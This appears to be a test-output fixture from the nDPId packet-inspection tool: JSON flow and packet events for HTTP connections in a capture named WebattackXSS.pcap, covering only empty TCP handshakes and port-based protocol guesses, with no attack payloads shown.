+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348030687,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348030687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gAJAAD4GRc6sEAABwKgKMomkAFDF6nYHAAAAAKACchCh2wAAAgQFtAQCCAoBPPYFAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":2,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348030687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiaQ\/ByIUxep2CKAScSB2PwAAAgQFtAQCCAoD5sd5ATz2BQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":3,"flow_last_seen":1499348030687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348030687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gANAAD4GRdWsEAABwKgKMomkAFDF6nYIPwciFYAQAOUVRwAAAQEICgE89gUD5sd5"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348033296,"flow_last_seen":1499348033296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348033296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1499348033296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LtJAAD4Glv6sEAABwKgKMom+AFA+iNZDAAAAAKACchDGWwAAAgQFtAQCCAoBPPiRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8830,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":2,"flow_last_seen":1499348033297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348033297,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQib4da6BXPojWRKAScSA7jAAAAgQFtAQCCAoD5soFATz4kQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":3,"flow_last_seen":1499348033297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348033297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LtNAAD4GlwWsEAABwKgKMom+AFA+iNZEHWugWIAQAOXakwAAAQEICgE8+JED5soF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348034569,"flow_last_seen":1499348034569,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348034569,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1499348034569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8z7RAAD4G9husEAABwKgKMonMAFCoJTZ7AAAAAKACchD7OgAAAgQFtAQCCAoBPPnPAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":2,"flow_last_seen":1499348034569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348034569,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiczTsUb+qCU2fKAScSASQAAAAgQFtAQCCAoD5stDATz5zwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":3,"flow_last_seen":1499348034570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348034570,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0z7VAAD4G9iKsEAABwKgKMonMAFCoJTZ807FG\/4AQAOWxRgAAAQEICgE8+dAD5stD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348037175,"flow_last_seen":1499348037175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348037175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1499348037175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MahAAD4GlCisEAABwKgKMonmAFDKJM3zAAAAAKACchA\/HQAAAgQFtAQCCAoBPPxbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":2,"flow_last_seen":1499348037175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348037175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiebQGLVtyiTN9KAScSDovwAAAgQFtAQCCAoD5s3PATz8WwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":3,"flow_last_seen":1499348037176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348037176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MalAAD4GlC+sEAABwKgKMonmAFDKJM300Bi1boAQAOWHxwAAAQEICgE8\/FsD5s3P"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348038438,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348038438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8j\/dAAD4GNdmsEAABwKgKMon0AFAYNXJgAAAAAKACchBLVgAAAgQFtAQCCAoBPP2XAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":2,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348038438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQifSSwJxVGDVyYaAScSBKLgAAAgQFtAQCCAoD5s8KATz9lwEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":3,"flow_last_seen":1499348038438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348038438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0j\/hAAD4GNeCsEAABwKgKMon0AFAYNXJhksCcVoAQAOXpNQAAAQEICgE8\/ZcD5s8K"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347905694,"flow_last_seen":1499347910877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347908253,"flow_last_seen":1499347913877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347909575,"flow_last_seen":1499347914878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347912141,"flow_last_seen":1499347917877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347913416,"flow_last_seen":1499347918877,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347914710,"flow_last_seen":1499347919878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348039911,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348041088,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348041088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8894,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1499348041088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348041088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l85AAD4GLgKsEAABwKgKMooOAFBaWpfjAAAAAKACchDg\/QAAAgQFtAQCCAoBPQAtAAAAAAEDAwc="} 
